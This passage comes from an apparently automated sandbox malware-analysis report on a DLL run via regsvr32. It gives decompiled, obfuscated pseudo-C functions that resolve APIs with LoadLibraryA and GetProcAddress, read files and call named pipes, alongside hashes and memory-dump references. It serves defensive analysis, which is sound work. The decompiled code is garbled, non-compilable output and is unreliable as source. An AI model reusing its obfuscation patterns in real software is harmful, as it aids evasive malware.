                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0B1F
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                • String ID:
                                • API String ID: 1557788787-0
                                • Opcode ID: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                                • Instruction ID: 75863bbc0e5a97b7931cc7ec22bc21650c1f600872e9325186121a1c448551bc
                                • Opcode Fuzzy Hash: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                                • Instruction Fuzzy Hash: A1213431F18BA982E620CF11A94002AA6E8BB58BECB184174DE4E73B94DF3CE461C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 33%
                                			E00007FFC7FFC130F9F80(void* __ecx, signed int __edx, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                                				void* __rdi;
                                				void* __rbp;
                                				void* __r12;
                                				void* _t138;
                                				void* _t139;
                                				signed int _t147;
                                				signed short _t154;
                                				void* _t159;
                                				signed int _t171;
                                				signed int* _t173;
                                				signed int _t174;
                                				signed long long _t176;
                                				signed long long _t177;
                                				signed int _t179;
                                				signed int* _t198;
                                				signed int _t201;
                                				signed long long _t210;
                                				signed long long _t232;
                                				signed int* _t235;
                                				signed long long _t242;
                                				CHAR* _t246;
                                				signed int _t247;
                                				void* _t253;
                                				long long _t254;
                                				void* _t261;
                                				void* _t262;
                                				signed int* _t265;
                                				void* _t274;
                                				void* _t276;
                                				void* _t278;
                                				void* _t280;
                                
                                				_t268 = __r9;
                                				 *((long long*)(_t261 + 0x18)) = __rbx;
                                				 *(_t261 + 0x20) = r9d;
                                				 *((long long*)(_t261 + 8)) = __rcx;
                                				_t262 = _t261 - 0x90;
                                				_t171 =  *(_t262 + 0xf8);
                                				_t201 = __rdx - 0x3595;
                                				r12d =  *(_t262 + 0x100);
                                				r10d = __rdx + 0x354;
                                				_t198 =  *((intOrPtr*)(_t262 + 0xf0));
                                				r15d = r9d;
                                				 *(_t262 + 0x74) = _t201;
                                				r13d = _t171 - 0x228c;
                                				 *(_t262 + 0xf8) = __rdx + 0xfffff21d;
                                				r11d = _t274 + 0x14c1;
                                				 *((long long*)(_t262 + 0x78)) = _t171 + 0x522;
                                				r14d = _t280 - 0x12f1;
                                				_t173 =  *(_t262 + 0x108);
                                				 *(_t262 + 0x7c) = r11d;
                                				 *(_t262 + 0x108) = _t235;
                                				 *(_t262 + 0x80) = r14d;
                                				r9d = _t173 - 0x11a9;
                                				r8d = _t173 - 0x923;
                                				 *(_t262 + 0xd8) = r9d;
                                				_t174 =  *(_t262 + 0x110);
                                				 *(_t262 + 0x70) = r8d;
                                				_t254 = _t174 - 0x11a9;
                                				_t247 = _t174 + 0x984;
                                				 *((long long*)(_t262 + 0x84)) = _t254;
                                				 *(_t262 + 0x110) = _t247;
                                				if (r14d - _t138 < 0) goto 0x130fa261;
                                				_t139 = _t278 + 0x1663;
                                				if (r15d == _t139) goto 0x130fa261;
                                				_t176 = _t198[0x8f];
                                				 *_t176 =  *_t176 + _t176;
                                				 *((intOrPtr*)(_t201 - 0x7f)) =  *((intOrPtr*)(_t201 - 0x7f)) + _t139;
                                				asm("jmp dword 0x8b48:0x283");
                                				 *0x343a =  *0x343a;
                                				 *((intOrPtr*)(_t176 - 0x75)) =  *((intOrPtr*)(_t176 - 0x75)) + __ecx;
                                				_t177 = _t176 | 0x00000001;
                                				 *_t177 =  *_t177 + _t139;
                                				r8d = __edx;
                                				r9d = 0x329d;
                                				 *(_t262 + 0x88) = r10d;
                                				 *(_t262 + 0x50) = 0x13118090;
                                				 *(_t262 + 0x48) = 0x7d;
                                				 *(_t262 + 0x40) = 0x1a;
                                				 *(_t262 + 0x38) =  *((intOrPtr*)(_t177 + 0x130)) - 0x23ef;
                                				asm("loopne 0x3");
                                				 *0x13118090 =  *0x13118090 + _t139;
                                				 *(_t262 + 0x28) = 0x3666;
                                				 *(_t262 + 0x20) = _t198;
                                				E00007FFC7FFC130FF290(__ecx, __edx, _t198, _t235, __r8, __r9, _t280, _t278, _t276, _t274, _t235);
                                				r9d =  *(_t262 + 0xf8);
                                				r8d =  *(_t262 + 0x110);
                                				r11d = _t247 - 0x1956;
                                				r12d =  &(_t235[0x4c2]);
                                				r10d = _t276 + 0x23f6;
                                				r14d = _t276 + 0x30d5;
                                				_t198[0x8f] = 0x13118090;
                                				_t179 = _t254 + 0x19bd;
                                				 *(_t262 + 0x68) = _t179;
                                				 *(_t262 + 0x60) =  &(_t235[0x597]);
                                				r15d = r15d + 0xfffffbb6;
                                				 *(_t262 + 0x58) = r10d;
                                				r9d = r9d + 0xfffffc44;
                                				 *(_t262 + 0x50) = r11d;
                                				r8d = r8d + 0xfffff9e1;
                                				 *(_t262 + 0x48) =  *(_t262 + 0x74) + 0x3189;
                                				 *(_t262 + 0x40) =  *((intOrPtr*)(_t262 + 0x78)) + 0x9db;
                                				 *(_t262 + 0x38) = _t254 + 0x1669;
                                				 *(_t262 + 0x30) = r14d;
                                				 *(_t262 + 0x28) = _t198;
                                				 *(_t262 + 0x20) = r15d;
                                				E00007FFC7FFC130E90B0(_t179, _t198,  &(_t235[0x597]),  *(_t262 + 0xd8) + 0x1b2d, __r8, __r11);
                                				r14d =  *(_t262 + 0x80);
                                				r8d =  *(_t262 + 0x74);
                                				r11d =  *(_t262 + 0x108);
                                				r8d = r8d + 0x27b2;
                                				r9d =  *(_t262 + 0x70);
                                				r11d =  &(r11d[0x4f6]);
                                				r10d = _t278 + 0x119f;
                                				 *(_t262 + 0xf8) = _t179;
                                				r9d = r9d + 0xfffff951;
                                				 *(_t262 + 0x48) = _t179;
                                				 *(_t262 + 0x40) = r8d;
                                				_t265 = _t198;
                                				 *(_t262 + 0x38) = r12d;
                                				 *(_t262 + 0x30) = r10d;
                                				 *(_t262 + 0x28) = r11d;
                                				 *(_t262 + 0x20) =  *((intOrPtr*)(_t262 + 0x78)) + 0xf39;
                                				E00007FFC7FFC130E2390(_t179, _t198,  *(_t262 + 0x100) + 0x1249,  *(_t262 + 0xd8) + 0x1b2d, _t265, _t268, _t274); // executed
                                				r8d =  *(_t262 + 0x70);
                                				r9d =  *(_t262 + 0xd8);
                                				r12d =  *(_t262 + 0x100);
                                				r15d =  *(_t262 + 0xe8);
                                				r11d =  *(_t262 + 0x7c);
                                				r10d =  *(_t262 + 0x88);
                                				if (r12d - _t276 + 0x27b2 >= 0) goto 0x130fa3c0;
                                				_t154 = _t274 + 0x216;
                                				if (r13d - _t154 >= 0) goto 0x130fa31a;
                                				r11d =  &(( *(_t262 + 0x108))[0x149]);
                                				r10d = _t265 - 0x526;
                                				 *(_t262 + 0x60) = _t179;
                                				 *(_t262 + 0x58) = r10d;
                                				r15d =  &(( *(_t262 + 0x108))[0x46b]);
                                				 *(_t262 + 0x50) = r11d;
                                				_t242 =  *((intOrPtr*)(_t262 + 0xd0)) + 0x44a;
                                				 *(_t262 + 0x48) = _t198;
                                				 *(_t262 + 0x40) = _t242;
                                				r14d =  &(r14d[0x337]);
                                				 *(_t262 + 0x38) = _t179;
                                				r9d = r9d + 0x4ca;
                                				 *(_t262 + 0x30) =  *((intOrPtr*)(_t262 + 0x84)) + 0x4ca;
                                				r8d = r8d + 0xfffffde6;
                                				 *(_t262 + 0x28) = r14d;
                                				 *(_t262 + 0x20) = r15d;
                                				E00007FFC7FFC130F75E0(_t179,  &(( *(_t262 + 0x108))[0x3bf]),  *(_t262 + 0xd8) + 0x66c); // executed
                                				goto 0x130fa47d;
                                				_t210 = _t198[0x40];
                                				if (_t210 != (_t278 + 0x1a2) * _t198[0x78]) goto 0x130fa340;
                                				r12d = r12d + _t159;
                                				_t232 = _t198[0x8a] & r9d;
                                				if (r13d - _t232 < 0) goto 0x130fa47d;
                                				if (_t198[0x24] - (r15d | _t210) <= 0) goto 0x130fa39c;
                                				r12d = r12d - r15d;
                                				 *_t198 =  *_t198 - (_t242 & 0x00002032) * 0x27ae;
                                				_t198[0x10] = _t198[0x10] - (_t198[0x44] - 0x000023f6 &  *_t198);
                                				goto 0x130fa3af;
                                				_t198[6] = _t198[6] ^  &(_t265[0x322]) * _t198[0x62] + _t198[0x1e];
                                				r13d = r13d + 2;
                                				if (r13d - _t232 >= 0) goto 0x130fa366;
                                				goto 0x130fa47d;
                                				if (_t198[0x86] - (_t198[0x86] - _t198[0x74] & 0x000030d5) >= 0) goto 0x130fa47d;
                                				r12d =  *(_t262 + 0x70);
                                				asm("o16 nop [eax+eax]");
                                				_t147 = r11w & 0xffffffff;
                                				 *(_t262 + 0x20) = _t198[0x4c] | 0x0000228c;
                                				r9d = _t154 & 0x0000ffff;
                                				r9d = r9d * _t147;
                                				r8d = _t147 * r12d * 0x30d5;
                                				CallNamedPipeA(_t246, _t253, ??, ??, ??);
                                				r11d =  *(_t262 + 0x7c);
                                				if (_t280 - 0x145b - (_t198[0x86] - _t198[0x74] & 0x000030d5) < 0) goto 0x130fa3f0;
                                				r12d =  *(_t262 + 0x100);
                                				return _t274 + 0xb3d;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CallNamedPipe
                                • String ID: f6$}
                                • API String ID: 1741058652-3232957126
                                • Opcode ID: 5162e8c7919a05a93b0b5628ffb614b8962b608f4fe67c094bdc8d360a9fccb2
                                • Instruction ID: 4a912ea950d157e64f95df2e8f679c6dc8f7e96f2cdfa83a0d30918d97e2c507
                                • Opcode Fuzzy Hash: 5162e8c7919a05a93b0b5628ffb614b8962b608f4fe67c094bdc8d360a9fccb2
                                • Instruction Fuzzy Hash: D9D18B736196C58BD724CF14E4447EABBA8F388758F104129EB8917B98DB7CE695CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 94%
                                			E00007FFC7FFC130E4820(void* __rax, long long __rbx, void* __rcx, void* __r8, void* __r9, void* __r10) {
                                				void* __rsi;
                                				void* __rbp;
                                				void* __r13;
                                				void* __r15;
                                				signed int _t132;
                                				void* _t147;
                                				signed int _t152;
                                				void* _t153;
                                				signed int _t159;
                                				signed int _t167;
                                				signed int _t168;
                                				signed int _t170;
                                				signed long long _t172;
                                				signed long long _t179;
                                				signed long long _t182;
                                				intOrPtr _t186;
                                				signed long long _t188;
                                				void* _t192;
                                				signed long long _t193;
                                				signed int _t194;
                                				void* _t196;
                                				signed int _t198;
                                				signed long long _t203;
                                				signed int _t214;
                                				void* _t224;
                                				signed long long _t225;
                                				signed long long _t226;
                                				signed long long _t228;
                                				void* _t232;
                                				signed int _t233;
                                				signed int _t234;
                                				signed int _t238;
                                				signed int _t239;
                                				void* _t242;
                                				void* _t243;
                                				void* _t245;
                                				void* _t248;
                                				void* _t249;
                                				long long _t250;
                                				void* _t252;
                                				void* _t254;
                                				signed long long _t255;
                                				void* _t257;
                                				CHAR* _t259;
                                				signed long long _t260;
                                
                                				_t248 = __r10;
                                				_t247 = __r9;
                                				_t245 = __r8;
                                				_t196 = __rcx;
                                				 *((long long*)(_t242 + 0x10)) = __rbx;
                                				 *(_t242 + 0x20) = r9d;
                                				_push(_t232);
                                				_push(_t252);
                                				_push(_t254);
                                				_push(_t257);
                                				_t243 = _t242 - 0x80;
                                				_t167 =  *(_t243 + 0x100);
                                				r10d = __r9 - 0x3666;
                                				r12d =  *(_t243 + 0xf8);
                                				r14d = __r9 - 0x22c;
                                				 *(_t243 + 0xc0) = r10d;
                                				r8d =  *(_t243 + 0xe8);
                                				_t9 = _t196 - 0x27b2; // 0x0
                                				_t238 = _t9;
                                				r8d = r8d + 0xffffee57;
                                				 *(_t243 + 0xd0) = _t238;
                                				 *(_t243 + 0x68) = r8d;
                                				r9d = _t167 + 0x1563;
                                				r12d = r12d + 0x984;
                                				r13d = _t167 - 0x2103;
                                				 *(_t243 + 0xe8) = r9d;
                                				 *(_t243 + 0x60) = _t167;
                                				_t224 = __rbx + 0xf39;
                                				if (r9d - __r10 + 0x23f6 <= 0) goto 0x130e4ab2;
                                				r8d = _t257 - 0x2b1;
                                				r10d = r10d + 0x37e1;
                                				r11d = _t254 + 0x38e9;
                                				_t255 =  *((intOrPtr*)(_t243 + 0x118));
                                				_t21 = _t238 + 0x2598; // 0x2598
                                				_t168 = _t21;
                                				 *(_t243 + 0x48) = _t168;
                                				 *(_t243 + 0x40) = _t224 - 0x44a;
                                				r15d = _t257 - 0x11ae;
                                				 *(_t243 + 0x38) = r8d;
                                				_t27 = _t238 + 0x228c; // 0x228c
                                				r9d = _t27;
                                				 *(_t243 + 0x30) = r10d;
                                				 *(_t243 + 0x28) = r15d;
                                				 *(_t243 + 0x20) = r11d;
                                				_t132 = E00007FFC7FFC130FAA10(_t168, _t224 - 0x55e, _t255, __r8, __r9, _t259); // executed
                                				r8d =  *(_t243 + 0xe8);
                                				r10d = _t252 - 0x278;
                                				r12d =  *(_t243 + 0xd0);
                                				_t192 = _t232 - 0x22c;
                                				_t233 =  *(_t243 + 0x100);
                                				_t198 = _t192 - 0x150e;
                                				 *(_t243 + 0x50) = _t198;
                                				r14d = _t132;
                                				 *(_t243 + 0x48) = _t198;
                                				 *(_t243 + 0x40) = _t168 + 0xfffffa6f;
                                				r9d = _t252 + 0x27ae;
                                				_t170 =  *(_t243 + 0x60);
                                				r11d = _t233 + 0x189;
                                				 *(_t243 + 0x38) = _t170;
                                				_t239 = _t233 + 0x495;
                                				 *(_t243 + 0x30) = r10d;
                                				_t225 = _t224 - 0x145b;
                                				 *(_t243 + 0x28) = r11d;
                                				r8d = r8d + 0x283;
                                				 *(_t243 + 0x20) = _t255;
                                				 *(_t243 + 0xf8) = _t225;
                                				E00007FFC7FFC130E7120(_t153, _t170, _t239, _t233, __r8, __r9, _t248, _t249);
                                				_t234 = _t170;
                                				LoadLibraryA(_t259);
                                				r10d = _t192 + 0x2ad;
                                				r11d = _t252 + 0x37e1;
                                				 *(_t243 + 0x50) = _t239;
                                				_t193 = _t225 + 0x1011;
                                				 *(_t255 + 0x268) = _t170;
                                				_t58 = _t234 + 0x1270; // 0x1270
                                				_t226 = _t58;
                                				_t60 = _t257 + 0x81; // 0x81
                                				r8d = _t60;
                                				_t172 =  *(_t255 + 0x1e0) | 0x0000343a;
                                				_t214 =  *(_t243 + 0xf8) + 0xe49;
                                				 *((intOrPtr*)(_t255 + 0x120)) =  *((intOrPtr*)(_t255 + 0x120)) + _t172;
                                				r9d = r15d;
                                				 *(_t243 + 0x48) = _t172;
                                				 *(_t243 + 0x40) = r10d;
                                				 *(_t243 + 0x38) = r11d;
                                				 *(_t243 + 0x30) = _t193;
                                				 *(_t243 + 0x28) = _t226;
                                				 *(_t243 + 0x20) = _t255;
                                				E00007FFC7FFC130E2730(_t172, _t193,  *(_t243 + 0x100) + 0x16de, _t234, _t245);
                                				r8d =  *(_t243 + 0xd8);
                                				r10d =  *(_t243 + 0xc0);
                                				 *(_t243 + 0x48) = r8d;
                                				_t75 = _t257 - 0xeb4; // -3764
                                				r11d = _t75;
                                				 *(_t243 + 0x40) = _t214;
                                				_t77 = _t234 + 0xcdf; // 0xcdf
                                				r9d = _t77;
                                				 *(_t243 + 0x38) = _t172;
                                				r10d = r10d + 0x3a59;
                                				 *(_t243 + 0x30) = r10d;
                                				 *(_t243 + 0x28) = r11d;
                                				 *(_t243 + 0x20) = _t193;
                                				E00007FFC7FFC130E1000(_t172, _t193,  *(_t243 + 0x100) + 0x16de, _t234, _t255, _t247);
                                				goto 0x130e4c65;
                                				_t194 =  *((intOrPtr*)(_t243 + 0x118));
                                				_t260 = r12d;
                                				if ( *((intOrPtr*)(_t194 + 0x80)) -  *(_t194 + 0x48) * _t260 > 0) goto 0x130e4ae9;
                                				if (r12d - (r8d & r12d) > 0) goto 0x130e4ae9;
                                				_t203 = r10d;
                                				_t179 =  *((intOrPtr*)(_t194 + 0x90)) +  *((intOrPtr*)(_t194 + 0x70)) ^ _t203;
                                				 *(_t243 + 0x60) = _t203;
                                				if (_t260 - _t179 > 0) goto 0x130e4c5f;
                                				 *(_t243 + 0xd8) = _t214;
                                				_t250 = r9d * 0x36e7;
                                				 *((long long*)(_t243 + 0x70)) = _t250;
                                				 *(_t243 + 0x100) = _t179 | 0x00001f2c;
                                				asm("o16 nop [eax+eax]");
                                				r8d = r8d *  *(_t194 + 0x40);
                                				_t182 =  *(_t194 + 0xc8) + _t250;
                                				r11d =  *(_t194 + 0x1c0);
                                				r11d = r11d + 0x1f2c;
                                				_t228 = _t226 * ( *((intOrPtr*)(_t194 + 0x120)) +  *((intOrPtr*)(_t194 + 0x60))) | _t182 -  *((intOrPtr*)(_t194 + 0x110));
                                				 *(_t194 + 0xc8) = r13d & _t260 ^ _t182;
                                				 *(_t243 + 0xf8) = _t228;
                                				r13d = r13d | r14d;
                                				_t186 =  *((intOrPtr*)(_t194 + 0x218));
                                				r10d = _t186 +  *((intOrPtr*)(_t194 + 0x188));
                                				_t188 =  *(_t194 + 0x1b8) | 0x0000343a;
                                				_t152 = _t255 + 0x00003a59 & r14d;
                                				r9d =  *(_t243 + 0x100);
                                				 *(_t243 + 0x48) = _t188;
                                				r9d = r9d & _t159;
                                				 *(_t243 + 0x40) = _t194;
                                				 *(_t243 + 0x38) = r10d;
                                				 *(_t243 + 0x30) = r11d;
                                				 *(_t243 + 0x28) = _t228 &  *(_t194 + 0x150) & 0x00002032;
                                				 *(_t243 + 0x20) = _t234 - _t186;
                                				_t147 = E00007FFC7FFC130F98F0(_t152, _t188,  *(_t194 + 0x1f8) * 0x1f2c, _t255, _t247, _t255);
                                				r12d = r12d + 4;
                                				 *_t188 =  *_t188 + _t147;
                                				 *((intOrPtr*)(_t188 + 0x2b)) =  *((intOrPtr*)(_t188 + 0x2b)) + _t152;
                                				asm("retf 0x148");
                                				 *_t188 =  *_t188 + _t147;
                                				r9d =  *(_t243 + 0xe8);
                                				r10d =  *(_t243 + 0xc0);
                                				r8d =  *(_t243 + 0x68);
                                				if (r12d - ( *((intOrPtr*)(_t194 + 0x90)) +  *((intOrPtr*)(_t194 + 0x70)) ^  *(_t243 + 0x60)) <= 0) goto 0x130e4b40;
                                				goto 0x130e4c65;
                                				return _t147;
                                			}

                                APIs
                                • LoadLibraryA.KERNEL32 ref: 00007FFC130E49B4
                                  • Part of subcall function 00007FFC130E2730: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00001270,00007FFC130E4A40), ref: 00007FFC130E285E
                                  • Part of subcall function 00007FFC130E1000: GetProcAddress.KERNEL32 ref: 00007FFC130E10D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: 62 $662
                                • API String ID: 2238633743-980518382
                                • Opcode ID: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction ID: 0e9f889a9c7703fea28eae440d8edf1887b3426929f3d104db7ca2830befe457
                                • Opcode Fuzzy Hash: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction Fuzzy Hash: AEB18C776186C58BD365CF24E484BDEBBA8F788788F004125EB8957B58DB38EA54CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 642 735ee8-735f0d 643 735f28-735f2d 642->643 644 735f0f-735f20 call 73908c 642->644 646 735f48-735f4d 643->646 647 735f2f-735f40 call 73908c 643->647 644->643 655 735f22 644->655 648 735f68-735f6f 646->648 649 735f4f-735f60 call 73908c 646->649 647->646 660 735f42 647->660 653 735f71-735f76 HeapFree 648->653 654 735f7c-735f83 648->654 649->648 661 735f62 649->661 653->654 658 735f90-735f97 654->658 659 735f85-735f8a HeapFree 654->659 655->643 662 735fa4-735fab 658->662 663 735f99-735f9e HeapFree 658->663 659->658 660->646 661->648 664 735fb8-735fc7 662->664 665 735fad-735fb2 HeapFree 662->665 663->662 665->664
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID:
                                • API String ID: 2332451156-0
                                • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction ID: 1e978a65ef2d2525a0e46a0ac37f691624cc37dfecf44c802f665f77e81a712b
                                • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction Fuzzy Hash: 9D213561605F9482FB29DB66EA4436D63A1EBC9FC4F5890169F0E6376ACF3CD981C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 23%
                                			E00007FFC7FFC130E11F0(void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long __r12, long long __r13, long long __r14, long long _a8, void* _a16, void* _a24, long long _a32, long long _a40, intOrPtr _a64, intOrPtr _a88, long long _a96, intOrPtr _a104) {
                                				void* _v32;
                                				void* _v40;
                                				intOrPtr _v48;
                                				long long _v56;
                                				long long _v64;
                                				long long _v72;
                                				intOrPtr _v80;
                                				long long _v88;
                                				long long _v96;
                                				long long _v104;
                                				void* __rbx;
                                				void* _t74;
                                				intOrPtr _t76;
                                				int _t77;
                                				int _t79;
                                				signed int _t84;
                                				long long _t88;
                                				void* _t93;
                                				void* _t99;
                                				signed long long _t113;
                                				long long _t118;
                                				long long _t123;
                                				long long _t124;
                                				signed long long _t131;
                                				long long _t141;
                                				void* _t152;
                                				signed long long _t160;
                                				void* _t165;
                                				long long _t172;
                                
                                				_t99 = _t152;
                                				r11d = _a88;
                                				_t141 = __rdx - 0xfd2;
                                				_t172 = _a96;
                                				r11d = r11d + 0xfffff8a0;
                                				 *((long long*)(_t99 + 0x10)) = __rbp;
                                				 *((long long*)(_t99 + 0x18)) = __rsi;
                                				 *((long long*)(_t99 - 0x20)) = __r13;
                                				r13d = __rcx - 0x3a59;
                                				_t123 = _a40;
                                				 *((long long*)(_t99 - 0x28)) = __r14;
                                				r14d = __r8 - 0x1044;
                                				r8d = _a104;
                                				r8d = r8d + 0xffffdefd;
                                				_a8 = _t141;
                                				_a88 = r11d;
                                				_a104 = r8d;
                                				if (r8d - _t74 >= 0) goto 0x130e130e;
                                				 *((intOrPtr*)(_t172 + 0x98)) =  *((intOrPtr*)(_t172 + 0x368));
                                				r11d = __r8 + 0x329d;
                                				r10d = __r13 + 0x27b2;
                                				_v48 = r10d;
                                				r8d = _t123 + 0xf35;
                                				_v56 = _t172;
                                				_v64 = _t123 + 0xc88;
                                				_v72 = _a64 + 0xde3;
                                				_v80 = r11d;
                                				r9d = __r14 + 0xd93;
                                				_v88 = _t118;
                                				_v96 = _t141;
                                				_v104 = __rsi;
                                				_t76 = E00007FFC7FFC130F84E0(_a64 + 0xde3, _t118, __rsi, __r8, _t165, __r14); // executed
                                				_t124 =  *((intOrPtr*)(_t172 + 0x348));
                                				r8d = _t76;
                                				 *((long long*)(_t172 + 0x158)) = _t124;
                                				goto 0x130e1428;
                                				_a40 = _t141;
                                				r10d = __r13 + 0x27ae;
                                				_t88 = _t141;
                                				if (_t88 != 0) goto 0x130e142f;
                                				_a32 = __r12;
                                				r12d = _t124 + 0x2ee;
                                				r12d = r12d & 0x000023f6;
                                				asm("o16 nop [eax+eax]");
                                				if (_t88 == 0) goto 0x130e13c6;
                                				asm("o16 nop [eax+eax]");
                                				_t77 = ReadFile(??, ??, ??, ??, ??);
                                				if (__r13 + 0x3189 - ( *(_t172 + 0x220) &  *(_t172 + 0xe8)) + 0x1f2c < 0) goto 0x130e1370;
                                				r10d = _a40;
                                				r11d = _a88;
                                				r9d = 0;
                                				if (r12d > 0) goto 0x130e1406;
                                				_t160 =  *(_t172 + 0x1b8) ^ 0x00002598;
                                				if (_t160 == 0) goto 0x130e13fd;
                                				_t84 = r13d;
                                				r14d = r14d | _t84;
                                				if (_t77 != _t160) goto 0x130e13f0;
                                				r9d = r9d + 3;
                                				_t93 = r9d - r12d;
                                				if (_t93 >= 0) goto 0x130e13e0;
                                				r10d = r10d + 4;
                                				_a40 = r10d;
                                				if (_t93 == 0) goto 0x130e1340;
                                				r8d = _a104;
                                				if (r8d - _t77 < 0) goto 0x130e1503;
                                				 *(_t172 + 0x198) =  *(_t172 + 0x198) * 0x1873ac2e;
                                				if ( *((intOrPtr*)(_t172 + 0x158)) == 0) goto 0x130e14a9;
                                				_t113 =  *(_t172 + 0x1e0) | 0x000038e9;
                                				 *(_t172 + 0x198) = _t113;
                                				GetProcessHeap();
                                				if (_t113 == 0) goto 0x130e14a9;
                                				_t131 = _t113; // executed
                                				_t79 = HeapFree(??, ??, ??); // executed
                                				if (_t84 - _t131 > 0) goto 0x130e1503;
                                				asm("o16 nop [eax+eax]");
                                				 *((long long*)(_t172 + 0x228)) =  *((intOrPtr*)(_t172 + 0x228)) - 0x2598;
                                				if (_t84 - _t131 <= 0) goto 0x130e14e0;
                                				return _t79;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapProcess$BoundaryDeleteDescriptorFilePrivilegeReadRelease
                                • String ID:
                                • API String ID: 3718122545-0
                                • Opcode ID: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                                • Instruction ID: 9d81bc32470b191a1162693f1a61b7586ffba95175970f3db8011de9cd3ecde5
                                • Opcode Fuzzy Hash: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                                • Instruction Fuzzy Hash: 3071BC73605BE58AD720CB15E048BEE77A8FB88B88F525035CB5D57B80EB38E551CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 24%
                                			E00737CF4(void* __ebx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, signed long long* __r9, signed int _a8, long long _a16, long long _a24, signed int* _a40) {
                                				void* _v40;
                                				char _v56;
                                				signed int _v64;
                                				signed int _v72;
                                				signed int _t31;
                                				signed int _t33;
                                				signed int _t39;
                                				signed int _t46;
                                				long long _t54;
